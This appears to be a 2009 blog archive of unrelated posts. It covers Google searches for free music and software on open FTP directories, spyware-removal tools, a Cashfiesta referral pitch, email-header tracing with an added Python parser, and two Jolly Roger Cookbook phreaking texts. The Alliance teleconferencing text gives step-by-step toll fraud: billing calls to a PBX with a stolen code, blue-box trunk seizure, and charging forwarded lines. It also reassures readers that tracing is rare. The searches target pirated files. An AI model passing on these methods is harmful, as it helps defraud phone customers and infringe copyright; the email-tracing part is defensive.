Use the engine to its fullest. If you don't find your answer in the web section, try the groups section. Hell, try a whole different search engine. Don't limit yourself, because sometimes engines seem to intentionally leave results out.
ex. use google, yahoo, and altavista. Search the same terms... pretty close, right? Now search for disney death. Funny, altavista has plenty of disney, but no death...hmmm.

If you've read this far into this tutorial without saying, "Great, a guy that copied a few google help pages and thinks it's useful info", then I will show you WHY (besides accuracy, speed, and consistency in finding info on ANYTHING) it's nice to know how a search engine works. You combine it with your knowledge of other protocols.

Example:
Want free music? Free games? Free software? Free movies? God bless FTP! Try this search:
intitle:"Index of music" "rolling stones" mp3
Substitute rolling stones with your favorite band. No? Try the song name, or another file format. Play with it. Assuming SOMEONE made an FTP site and uploaded it, you'll find it.

For example....I wanted to find some Sepultura. If you never heard them before, they're a Brazilian heavy metal band that kicks ass. I started with this:
intitle:"Index of music" "Sepultura" mp3 <-- nothing
intitle:"Index of música" "Sepultura" mp3 <-- nothing
intitle:"Index of musica" "Sepultura" mp3 <-- not good enough
intitle:"Index of music" "Sepultura" * <-- found great stuff, but not enough Sepultura

At this point it occurs to me that I may be missing something, so I try:
intitle:"index of *" "sepultura" mp3 <-- BANG!
(and thats without searching for spelling errors)
Also try inurl:ftp

I find that * works better for me than trying to guess other peoples mis-spellings.



The same method applies for ebooks, games, movies, SW, anything that may be on an FTP site.

I hope you enjoyed this tutorial. I saw that a book and an article were recently written on this very same topic. I haven't read them as of yet, but check them out, and get back to me if you feel I missed something important and should include anything else.

intitle:"index of" "google hacks" ebook


Ps. I've said it before, I'll say it again... BE CREATIVE.
You'll be surprised what you can find.


Sunday, 15 March 2009

All About Spyware

There are a lot of PC users who know little about "Spyware", "Mal-ware", "hijackers", "Dialers" and many more. This will help you avoid pop-ups, spammers and all those baddies.

What is spy-ware?
Spy-ware is Internet jargon for Advertising Supported software (Ad-ware). It is a way for shareware authors to make money from a product other than by selling it to the users. There are several large media companies that offer to place banner ads in their products in exchange for a portion of the revenue from banner sales. This way, you don't have to pay for the software and the developers still get paid. If you find the banners annoying, there is usually an option to remove them by paying the regular licensing fee.

Known spywares
There are thousands out there; new ones are added to the list every day. But here are a few:
Alexa, Aureate/Radiate, BargainBuddy, ClickTillUWin, Conducent Timesink, Cydoor, Comet Cursor, eZula/KaZaa Toptext, Flashpoint/Flashtrack, Flyswat, Gator, GoHip, Hotbar, ISTbar, Lions Pride Enterprises/Blazing Logic/Trek Blue, Lop (C2Media), Mattel Broadcast, Morpheus, NewDotNet, Realplayer, Songspy, Xupiter, Web3000, WebHancer, Windows Messenger Service.

How to check if a program has spyware?
There is this little site that keeps a database of programs that are known to install spyware.

Check Here: http://www.spywareguide.com/product_search.php

If you would like to block pop-ups (IE Pop-ups).
There are tons of different types out there, but these are the 2 best, I think.

Try: Google Toolbar (http://toolbar.google.com/) This program is Free
Try: AdMuncher (http://www.admuncher.com) This program is Shareware

If you want to remove the "spyware" try these.
Try: Lavasoft Ad-Aware (http://www.lavasoftusa.com/) This program is Free
Info: Ad-aware is a multi-spyware removal utility that scans your memory, registry and hard drives for known spyware components and lets you remove them. The included backup manager lets you reinstall a backup, and it offers multi-language support.

Try: Spybot-S&D (http://www.safer-networking.org/) This program is Free
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer. Blocks ActiveX downloads, tracking cookies and other threats. Over 10,000 detection files and entries. Provides detailed information about found problems.

Try: BPS Spyware and Adware Remover (http://www.bulletproofsoft.com/spyware-remover.html) This program is Shareware
Info: Adware, spyware, trackware and big brotherware removal utility with multi-language support. It scans your memory, registry and drives for known spyware and lets you remove them. Displays a list and lets you select the items you'd like to remove.

Try: Spy Sweeper v2.2 (http://www.webroot.com/wb/products/spysweeper/index.php) This program is Shareware
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer.
The best scanner out there, and updated all the time.

Try: HijackThis 1.97.7 (http://www.spywareinfo.com/~merijn/downloads.html) This program is Freeware
Info: HijackThis is a tool that lists all installed browser add-ons, buttons and startup items, allows you to inspect them, and optionally removes selected items.


If you would like to prevent "spyware" being install.
Try: SpywareBlaster 2.6.1 (http://www.wilderssecurity.net/spywareblaster.html) This program is Free
Info: SpywareBlaster doesn't scan for and clean so-called spyware, but prevents it from being installed in the first place. It achieves this by disabling the CLSIDs of popular spyware ActiveX controls, which also prevents any of them from being installed via a webpage.

Try: SpywareGuard 2.2 (http://www.wilderssecurity.net/spywareguard.html) This program is Free
Info: SpywareGuard provides a real-time protection solution against so-called spyware. It works similar to an anti-virus program, by scanning EXE and CAB files on access and alerting you if known spyware is detected.

Try: XP-AntiSpy (http://www.xp-antispy.org/) This program is Free
Info: XP-AntiSpy is a small utility to quickly disable some built-in update and authentication features in Windows XP that may raise security or privacy concerns for some people.




Try: SpySites (http://camtech2000.net/Pages/SpySites_Prog...ml#SpySitesFree) This program is Free
Info: SpySites allows you to manage the Internet Explorer Restricted Zone settings and easily add entries from a database of 1500+ sites that are known to use advertising tracking methods or attempt to install third party software.

If you would like more Information about "spyware".
Check these sites.
http://www.spychecker.com/
http://www.spywareguide.com/
http://www.cexx.org/adware.htm
http://www.theinfomaniac.net/infomaniac/co...rsSpyware.shtml
http://www.thiefware.com/links/
http://simplythebest.net/info/spyware.html

Useful tools...
Try: Stop Windows Messenger Spam 1.10 (http://www.jester2k.pwp.blueyonder.co.uk/j...r2ksoftware.htm) This program is Free
Info: "Stop Windows Messenger Spam" stops this service from running and halts spammers' ability to send you these messages.

----------------------------------------------------------------------------
All this software will help remove and prevent evil spammers and spyware attacking your PC. I myself recommend getting "spyblaster", "s&d spybot", "spy sweeper" & "admuncher" to protect your PC. A weekly scan is also recommended.




Friday, 06 March 2009

Best Affiliate Site

I found a great Internet company - Cashfiesta.com - that has created a product everyone can benefit from. They pay you while you work or play on your computer. All you need to do is keep their software - the FiestaBar™ - active while you are online. They even pay you when your friends are using their computers.

Free money making opportunity. Join Cashfiesta.com and earn cash.

Unlike other companies, Cashfiesta gives you control over how much money you earn. They have an individual payrate based on the number of Special Offers you sign up for. As some of these offers are free, you can increase your payrate up to 33 times without spending a penny.

Free money making opportunity. Join Cashfiesta.com and earn cash.
It's free and easy to join and your privacy is completely protected. Here is the link, enjoy and happy money making.

http://www.cashfiesta.com/php/join.php?ref=maluqi82

Check it out!

Maman Lukman





There are different ways to build up your referral network. One is to just tell your friends, family, and other acquaintances about the benefits of being a Cashfiesta member. It only takes a minute to catch their attention - show them a copy of the check you received from Cashfiesta.com, tell them about the special deal offered to you by one of our partners.

Email promotion is another way to approach your friends and acquaintances. Below we have provided a sample email you can use to quickly and efficiently reach a group of friends and acquaintances, but remember - Cashfiesta tolerates ABSOLUTELY NO SPAM.

There are legitimate (no spam) ways to expand your referral network to include people you don't even know. If you are a Webmaster, you can link your web site to Cashfiesta using your referral URL. For linking codes, banners and tips, go to the Webmasters page. Even if you don't have a web site, you can still generate visits to your referral URL and make lots of new referrals by utilizing some of the Referral Tips we have prepared for you.






Wednesday, 04 March 2009

Phone Systems Tutorial

by The Jolly Roger

To start off, we will discuss the dialing procedures for domestic
as well as international dialing. We will also take a look at the
telephone numbering plan.

North American Numbering Plan
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

In North America, the telephone numbering plan is as follows:

A) a 3 digit Numbering Plan Area (NPA) code, ie, area code
B) a 7 digit telephone # consisting of a 3 digit Central Office
(CO) code plus a 4 digit station #

These 10 digits are called the network address or destination
code. It is in the format of:

Area Code Telephone #
--------- -----------

N*X NXX-XXXX

Where: N = a digit from 2 to 9
* = the digit 0 or 1
X = a digit from 0 to 9



Area Codes
~~~~~~~~~~

Check your telephone book or the separate listing of area codes
found on many bbs's. Here are the special area codes (SAC's):

510 - TWX (USA)
610 - TWX (Canada)
700 - New Service
710 - TWX (USA)
800 - WATS
810 - TWX (USA)
900 - DIAL-IT Services
910 - TWX (USA)





The other area codes never cross state lines, therefore each state
must have at least one exclusive NPA code. When a community is
split by a state line, the CO #'s are often interchangeable (ie,
you can dial the same number from two different area codes).

TWX (Telex II) consists of 5 teletype-writer area codes. They are
owned by Western Union. These SAC's may only be reached via other
TWX machines. These run at 110 baud (last I checked! They are most
likely faster now!). Besides the TWX #'s, these machines are
routed to normal telephone #'s. TWX machines always respond with
an answerback. For example, WU's FYI TWX # is (910) 279-5956. The
answerback for this service is "WU FYI MAWA".

If you don't want to buy a TWX machine, you can still send TWX
messages using Easylink [800/325-4112]. However, you are gonna have
to hack your way onto this one!

700:

700 is currently used by AT&T as a call forwarding service. It is
targeted towards salesmen on the run. To understand how this
works, I'll explain it with an example. Let's say Joe Q. Salespig
works for AT&T security and he is on the run chasing a phreak
around the country who royally screwed up an important COSMOS
system. Let's say that Joe's 700 # is (700) 382-5968. Every time
Joe goes to a new hotel (or most likely SLEAZY MOTEL), he dials a
special 700 #, enters a code, and the number where he is staying.
Now, if his boss received some important info, all he would do is
dial (700) 382-5968 and it would ring wherever Joe last programmed
it to. Neat, huh?

800:

This SAC is one of my favourites since it allows for toll free
calls. INWARD WATS (INWATS), or Inward Wide Area
Telecommunications Service is the 800 #'s that we are all familiar
with. 800 #'s are set up in service areas or bands. There are 6 of
these. Band 6 is the largest and you can call a band 6 # from
anywhere in the US except the state where the call is terminated
(that is why most companies have one 800 number for the country
and then another one for their state.) Band 5 includes the 48
contiguous states. All the way down to band 1 which includes only
the states contiguous to that one. Therefore, fewer people can
reach a band 1 INWATS # than a band 6 #.

Intrastate INWATS #'s (ie, you can call it from only 1 state)
always have a 2 as the last digit in the exchange (ie, 800-NX2-
XXXX). The NXX on 800 #'s represent the area where the business is
located. For example, a # beginning with 800-431 would terminate
at a NY CO.

800 #'s always end up in a hunt series in a CO. This means that it
tries the first # allocated to the company for their 800 lines; if
this is busy, it will try the next #, etc. You must have a minimum
of 2 lines for each 800 #. For example, Travelnet uses a hunt
series. If you dial (800) 521-8400, it will first try the #
associated with 8400; if it is busy it will go to the next
available port, etc. INWATS customers are billed by the number of
hours of calls made to their #.

OUTWATS (OUTWARD WATS): OUTWATS are for making outgoing calls
only. Large companies use OUTWATS since they receive bulk-rate
discounts. Since OUTWATS numbers cannot have incoming calls, they
are in the format of:

(800) *XXX-XXXX

Where * is the digit 0 or 1 (or it may even be designated by a
letter) which cannot be dialed unless you box the call. The *XX
identifies the type of service and the areas that the company can
call.

Remember:

INWATS + OUTWATS = WATS EXTENDER

900:

This DIAL-IT SAC is a nationwide dial-it service. It is used for
taking television polls and other stuff. The first minute
currently costs an outrageous 50-85 cents and each additional
minute costs 35-85 cents. Hell takes in a lot of revenue this way!

Dial (900) 555-1212 to find out what is currently on this service.

CO CODES
~~~~~~~~

These identify the switching office where the call is to be
routed. The following CO codes are reserved nationwide:

555 - directory assistance
844 - time. These are now in!
936 - weather the 976 exchange
950 - future services
958 - plant test
959 - plant test
970 - plant test (temporary)
976 - DIAL-IT services

Also, the 3 digit ANI & ringback #'s are regarded as plant test
and are thus reserved. These numbers vary from area to area.

You cannot dial a 0 or 1 as the first digit of the exchange code
(unless using a blue box!). This is due to the fact that these
exchanges (000-199) contain all sorts of interesting shit such as
conference #'s, operators, test #'s, etc.

950:

Here are the services that are currently used by the 950 exchange:

1000 - SPC
1022 - MCI Execunet
1033 - US Telephone
1044 - Allnet
1066 - Lexitel
1088 - SBS Skyline

These SCC's (Specialized Common Carriers) are free from fortress
phones! Also, the 950 exchange will probably be phased out with
the introduction of Equal Access.

Plant Tests:

These include ANI, Ringback, and other various tests.

976:

Dial 976-1000 to see what is currently on the service. Also, many
bbs's have listings of these numbers.

N11 codes:
----------
Bell is trying to phase out some of these, but they still exist in
most areas.

011 - international dialing prefix
211 - coin refund operator
411 - directory assistance
611 - repair service
811 - business office
911 - EMERGENCY

International Dialing
~~~~~~~~~~~~~~~~~~~~~

With International Dialing, the world has been divided into 9
numbering zones. To make an international call, you must first
dial: International Prefix + Country code + National #

In North America, the international dialing prefix is 011 for
station-to-station calls. If you can dial International #'s
directly in your area then you have International Direct Distance
Dialing (IDDD).

The country code, which varies from 1 to 3 digits, always has the
world numbering zone as the first digit. For example, the country
code for the United Kingdom is 44, thus it is in world numbering
zone 4. Some boards may contain a complete listing of other
country codes, but here I give you a few:

1 - North America (US, Canada, etc.)
20 - Egypt
258 - Mozambique
34 - Spain
49 - Germany
52 - Mexico (southern portion)
7 - USSR
81 - Japan
98 - Iran (call & hassle those bastards!)

If you call from an area other than North America, the format is
generally the same. For example, let's say that you wanted to call
the White House from Switzerland to tell the prez that his
numbered bank account is overdrawn (it happens, you know! ha ha).
First you would dial 00 (the Swiss international dialing prefix),
then 1 (the US country code), followed by 202-456-1414 (the
national # for the White House. Just ask for Georgy and give him
the bad news!)

Also, country code 87 is reserved for Maritime mobile service, ie,
calling ships:

871 - Marisat (Atlantic)
871 - Marisat (Pacific)
872 - Marisat (Indian)

International Switching:
------------------------

In North America there are currently 7 no. 4 ESS's that perform
the duty of ISC (Inter-nation Switching Centers). All
international calls dialed from numbering zone 1 will be routed
through one of these "gateway cities". They are:

182 - White Plains, NY
183 - New York, NY
184 - Pittsburgh, PA
185 - Orlando, Fl
186 - Oakland, CA
187 - Denver, CO
188 - New York, NY

The 18X series are operator routing codes for overseas access (to
be further discussed with blue boxes). All international calls use
a signaling service called CCITT. It is an international standard
for signaling.

Ok.. there you go for now! If you wanna read more about this, read
part two which is the next file #36 in the Jolly Roger's cookbook!

Monday, 02 March 2009

Backtracking EMAIL Messages

Tracking email back to its source:
'cause I hate spammers...

Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately this is symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from, the safe bet is to assume the "From" header is forged.

So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I've changed my email address and the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.


Return-Path:

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])
by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7
for ; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200

Message-ID:

From: "Maricela Paulson"

Reply-To: "Maricela Paulson"

To: davar@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha

Date: Sun, 16 Nov 2003 19:42:31 +0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"

According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be a waste of time. This message didn't come from yahoo's email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.


Here is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1)
12.0.0.0 - 12.255.255.255
Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)
12.218.168.0 - 12.218.175.255




# ARIN WHOIS database, last updated 2003-12-31 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost
Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com
Address: 12.218.172.108

Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address-to-hostname mapping of the remote server, 12-218-172-108.client.mchsi.com. If I put www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom's web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host's IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message; the best you can hope for is to find out what host sent it. Even in the case of a PGP signed message there is no guarantee that one particular person actually pressed the send button. Obviously, determining the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.
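The header walk described in this post, written up as an added Python example (not code from the post or its author): it parses the Received chain top-down, takes only the header written by our own MTA at face value, records the IP our MTA saw as the entry point, and flags the tell-tales the post relies on: a peer address that is a network address under the classful rules the post applies, a HELO name that disagrees with reverse DNS, and hostnames that look like dial-up or cable client pools. The message text is a constructed stand-in for the quoted headers (the angle-bracket addresses the page leaves blank are filled from X-Original-To and the prose), the trusted-MTA set and the client-pool pattern are assumptions for the example, and the timestamp check (each hop's time should be later than the one below it) goes slightly beyond what the post does by hand.

```python
import re
import ipaddress
from dataclasses import dataclass, field
from datetime import datetime
from email import message_from_string
from email.utils import parsedate_to_datetime
from typing import List, Optional

# Constructed sample: the headers quoted in the post, with the angle-bracket
# addresses the page leaves blank filled in from X-Original-To / the prose.
SAMPLE_MESSAGE = """\
X-Original-To: davar@example.com
Delivered-To: davar@example.com
Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])
\tby mailhost.example.com (Postfix) with SMTP id 1F9B8511C7
\tfor <davar@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)
Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200
From: "Maricela Paulson" <s359dyxxt@yahoo.com>
To: davar@example.com
Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha
Date: Sun, 16 Nov 2003 19:42:31 +0200

(body omitted)
"""

# Our own MTA(s): the only Received headers we take at face value (assumption).
TRUSTED_MTAS = {"mailhost.example.com"}

HOP_RE = re.compile(r"^from\s+(?P<src>.*?)\s+by\s+(?P<by>\S+)", re.I)
IP_RE = re.compile(r"\[([0-9.]+)\]")
HELO_RE = re.compile(r"\(HELO\s+([^)\s]+)\)", re.I)
RDNS_RE = re.compile(r"\(([^\s()\[]+)\s*\[")
# Hostnames of dial-up / cable client pools (the post's client.mchsi.com
# heuristic, generalised; an assumption, not an authoritative list).
CLIENT_POOL_RE = re.compile(r"(^|\.)(client|dyn|dynamic|pool|dhcp|ppp)\.|^\d+-\d+-\d+-\d+\.", re.I)


@dataclass
class Hop:
    helo: Optional[str]       # name the sending host announced in HELO/EHLO
    rdns: Optional[str]       # name the receiving MTA resolved for the peer
    ip: Optional[str]         # peer address as logged by the receiving MTA
    by: str                   # MTA that wrote this Received header
    when: Optional[datetime]  # timestamp after the final ';'
    flags: List[str] = field(default_factory=list)


def parse_received(raw_message: str) -> List[Hop]:
    """Return the Received hops top-down (most recent first), as they appear in the headers."""
    msg = message_from_string(raw_message)
    hops = []
    for value in msg.get_all("Received", []):
        text = " ".join(value.split())            # unfold continuation lines
        m = HOP_RE.search(text)
        if not m:
            continue                              # not a 'from ... by ...' hop (e.g. local delivery)
        src, by = m.group("src"), m.group("by")
        helo_m, rdns_m, ip_m = HELO_RE.search(src), RDNS_RE.search(src), IP_RE.search(src)
        if helo_m:
            helo = helo_m.group(1)
        else:
            first = src.split()[0] if src.split() else None
            helo = None if first is None or first.startswith(("(", "[")) else first
        when = None
        if ";" in text:
            try:
                when = parsedate_to_datetime(text.rsplit(";", 1)[1].strip())
            except (TypeError, ValueError):
                when = None
        hops.append(Hop(helo, rdns_m.group(1) if rdns_m else None,
                        ip_m.group(1) if ip_m else None, by, when))
    return hops


def classful_network_address(ip_text: str) -> bool:
    """True if, under the classful rule the post applies, the host part is all zeros."""
    ip = ipaddress.ip_address(ip_text)
    if ip.version != 4:
        return False
    first = ip.packed[0]
    host_octets = 3 if first < 128 else 2 if first < 192 else 1 if first < 224 else 0
    return host_octets > 0 and all(b == 0 for b in ip.packed[4 - host_octets:])


def analyse(hops: List[Hop], trusted=TRUSTED_MTAS) -> dict:
    """Find the first hop outside our MTAs and flag the tell-tales the post describes."""
    report = {"entry_point": None, "flags": [], "transit_seconds": []}
    for i, hop in enumerate(hops):
        trusted_hop = hop.by in trusted
        if trusted_hop and report["entry_point"] is None:
            report["entry_point"] = hop.ip        # first peer our own MTA recorded
        label = f"hop {i} ({'our MTA' if trusted_hop else 'untrusted, may be forged'})"
        if hop.ip and classful_network_address(hop.ip):
            hop.flags.append(f"{label}: {hop.ip} is a network address under classful rules, not a host")
        if hop.helo and hop.rdns and hop.helo.lower() != hop.rdns.lower():
            hop.flags.append(f"{label}: HELO {hop.helo} does not match reverse DNS {hop.rdns}")
        for name in (hop.rdns, hop.helo, hop.by):
            if name and CLIENT_POOL_RE.search(name):
                hop.flags.append(f"{label}: {name} looks like a client pool host, not an authorized MTA")
                break
        report["flags"].extend(hop.flags)
    # Each header should be stamped later than the one beneath it; a negative gap is suspicious.
    for upper, lower in zip(hops, hops[1:]):
        if upper.when and lower.when:
            report["transit_seconds"].append(int((upper.when - lower.when).total_seconds()))
    return report


if __name__ == "__main__":
    result = analyse(parse_received(SAMPLE_MESSAGE))
    print("entry point:", result["entry_point"])
    for flag in result["flags"]:
        print(" -", flag)
```

On the sample the entry point comes out as 12.218.172.108, which is the address to look up with whois and to report to the netblock owner's abuse contact; the hop beneath it (HELO 0udjou, 193.12.169.0) is flagged but, having been written by an untrusted relay, is treated as unverifiable rather than as fact. The two timestamps are eight minutes apart in the right order, which is consistent with a genuine relay rather than a pasted-in header.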


Basic Alliance Teleconferencing

Basic Alliance Teleconferencing Courtesy of the Jolly Roger

Introduction:
------------
This phile will deal with accessing, understanding and using the Alliance
Teleconferencing Systems.... it has many sections and for best use should
be printed out...enjoy...

Alliance:
--------
Alliance Teleconferencing is an independent company which allows the general
public to access and use its conferencing equipment. Many rumors have
been floating around that Alliance is a subsidiary of AT&T.
Well, they are wrong. As stated above, Alliance is an entirely independent
company. They use sophisticated equipment to allow users to talk to many
people at once.

The Number:
---------
Alliance is in the 700 exchange, thus it is not localized, well, not
in a way. Alliance is only in certain states, and only
residents of these certain states can access by dialing direct. This,
however, will be discussed in a later chapter. The numbers for alliance are
as follows:
0-700-456-1000 (chicago)
-1001 (los angeles)
-1002 (chicago)
-1003 (houston)
-2000 (?)
-2001 (?)
-2002 (?)
-2003 (?)
-3000 (?)
-3001 (?)
-3002 (?)
-3003 (?)

The locations of the first 4 numbers are known and I have stated them.
However, the numbers in the 200x and 300x are not definitely known.
Rumor has it that the pattern repeats itself but this has not been proven.

Dialing:
-------
As stated before, Alliance is only in certain states and only these states
can access them via dialing direct. However, dialing direct causes your
residence to be charged for the conference and conference bills are not low!!!
Therefore, many ways have been discovered to start a conference without
having it billed to one's house. They are as follows:

1) Dialing through a PBX
2) Incorporating a Blue Box
3) Billing to a loop
4) Billing to a forwarded call

I am sure there are many more but these are the four I will deal with.

Dialing through a PBX:
------- ------- - ---
Probably the easiest method of creating a free conference is through a PBX.
Simply call one in a state that has Alliance, input the PBX's code,
dial 9 for an outside line and then dial alliance.
An example of this would be:

PBX: 800-241-4911

When it answers it will give you a tone. At this tone input your code.

Code: 1234

After this you will receive another tone, now dial 9 for an outside line.
You will now hear a dial tone. Simply dial Alliance from this point and
the conference will be billed to the PBX.


Using a Blue Box:
----- - ---- ---
Another rather simple way of starting a conference is with a Blue Box.
The following procedure is how to box a conference:
Dial a number to box off of. In this example we will use 609-609-6099
When the party answers hit 2600hz. This will cause the fone company's
equipment to think that you have hung up. You will hear a
You have now 'seized' a trunk. After this, switch to multi-frequency
and dial:

KP-0-700-456-x00x-ST
KP=KP tone on Blue Box
x=variable between 1 and 3
ST=ST tone on Blue Box
The equipment now thinks that the operator has dialed Alliance from her
switchboard and the conference shall be billed there. Since Blue Boxing
is such a large topic, this is as far as I will go into its uses.

Billing to a loop:
------- -- - ----
A third method of receiving a free conference is by billing out to a
loop. A loop is 2 numbers that when two people call, they can talk
to each other. You're saying woop-tee-do right? Wrong! Loops can be
useful to phreaks. First, dial Alliance direct. After going
through the beginning procedure, which will be discussed later in this
tutorial, dial 0 and wait for an Alliance operator. When she answers
tell her you would like to bill the conference to such and such a
number. (A loop where your phriend is on the other side) She will then
call that number to receive voice verification.
Of course your phriend will be waiting and will accept the charges.
Thus, the conference is billed to the loop.

Billing to call forwarding:
------- -- ---- ----------
When you dial a number that is call forwarded, it is first answered by
the original location, then forwarded. The original location will
hang up if 2600hz is received from only one end of the line.
Therefore, if you were to wait after the forwarded residence answered,
you would receive the original location's dial tone.

Example:
Dial 800-325-4067
The original residence would answer, then forward the call, a second
type of ringing would be heard. When this second residence answers
simply wait until they hang up. After about twenty seconds you will
then receive the original residence's dial tone since it heard 2600hz
from one end of the line. Simply dial Alliance from this point and the
conference will be billed to the original residence.
These are the four main ways to receive a free conference. I am sure
many more exist, but these four are quite handy themselves.

Logon Procedure:
----- ---------
Once Alliance answers you will hear a two-tone combination. This is their
way of saying 'How many people do you want on the conference dude?'
Simply type in a 2-digit combination, depending on what bridge of Alliance
you are on, between 10 and 59. After this either hit '*' to cancel the
conference size and input another or hit '#' to continue.
You are now in Alliance Teleconferencing and are only seconds away from
having your own roaring conference going strong!!!

Dialing in Conferees:
------- -- ---------
To dial your first conferee, dial 1+npa+pre+suff and await his/her answer.

npa=area code
pre=prefix
suff=suffix

If the number is busy, or if no one answers simply hit '*' and your call
will be aborted. But, if they do answer, hit the '#' key.
This will add them to the conference.
Now commence dialing other conferees.

Joining Your Conference:
------- ---- ----------
To join your conference from control mode simply hit the '#' key.
Within a second or two you will be chatting with all your buddies.
To go back into control mode, simply hit the '#' key again.

Transferring Control:
------------ -------
To transfer control to another conferee, go into control mode, hit the
# 6+1+npa+pre+suff of the conferee you wish to give control to. If after,
you wish to abort this transfer hit the '*' key.

:Transfer of control is often not available. When you
receive a message stating this, you simply cannot transfer control.

Muted Conferences:
----- -----------
To request a muted conference simply hit the 9 key. I am not exactly
sure what a muted conference is but it is probably a way to keep unwanted
eavesdroppers from listening in.

Dialing Alliance Operators:
------- -------- ---------
Simply dial 0 as you would from any fone and wait for the operator to answer.

Ending Your Conference:
------ ---- ----------
To end your conference all together, that is kick everyone including
yourself off, go into control mode and hit '*'...after a few seconds
simply hang up. Your conference is over.

Are Alliance Operators Dangerous?
--- -------- --------- ---------
No. Not in the least. The worst they can do to you while you are having
a conference is drop all conferees including yourself. This is in no
way harmful, just a little aggravating.

Alliance and Tracing:
-------- --- -------
Alliance can trace, as all citizens of the United States can.
But this has to all be pre-meditated and AT&T has to be called and it's
really a large hassle, therefore, it is almost never done. Alliance simply
does not want it known that teenagers are phucking them over.
The only sort of safety equipment Alliance has on-line is a simple pen
register. This little device simply records all the numbers of the
conferees dialed. No big deal. All Alliance can do is call up that person's
number, threaten and question. However, legally, they can do nothing because
all you did was answer your fone.

:Almost all instructions are told to the person in command by Alliance
recordings. A lot of this tutorial is just a listing of those
commands plus information gathered by either myself or the phellow
phreaks of the world!!!

(written by the Trooper)


In the CookBook 4! -= Exodus =-